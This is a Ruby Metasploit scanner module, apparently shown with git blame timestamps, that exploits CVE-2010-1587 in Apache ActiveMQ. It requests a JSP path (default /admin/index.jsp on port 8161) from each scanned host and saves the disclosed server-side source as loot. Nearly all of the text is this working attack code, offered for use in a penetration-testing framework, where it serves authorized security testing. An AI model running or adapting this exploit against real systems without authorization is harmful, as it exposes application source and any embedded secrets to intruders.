metasploit-framework/modules/auxiliary/scanner/http/apache_activemq_source_disc...

68 lines
1.9 KiB
Ruby
Raw Normal View History

2012-10-14 20:36:02 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2012-10-14 20:36:02 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
2012-10-14 20:36:02 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
2013-11-15 06:03:42 +00:00
'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',
2013-08-30 21:28:54 +00:00
'Description' => %q{
This module exploits a source code disclosure in Apache ActiveMQ. The
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
over Windows 2003 SP2 and Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Veerendra G.G', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-1587' ],
[ 'OSVDB', '64020' ],
2013-08-30 21:28:54 +00:00
[ 'BID', '39636' ],
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
]
))
2012-10-14 20:36:02 +00:00
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(8161),
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
])
2013-08-30 21:28:54 +00:00
end
2012-10-14 20:36:02 +00:00
2013-08-30 21:28:54 +00:00
def run_host(ip)
2012-10-14 20:36:02 +00:00
2013-08-30 21:28:54 +00:00
print_status("#{rhost}:#{rport} - Sending request...")
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
})
2012-10-14 20:36:02 +00:00
2013-08-30 21:28:54 +00:00
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['TARGETURI'])
path = store_loot(
'apache.activemq',
'text/plain',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
2012-10-14 20:36:02 +00:00
end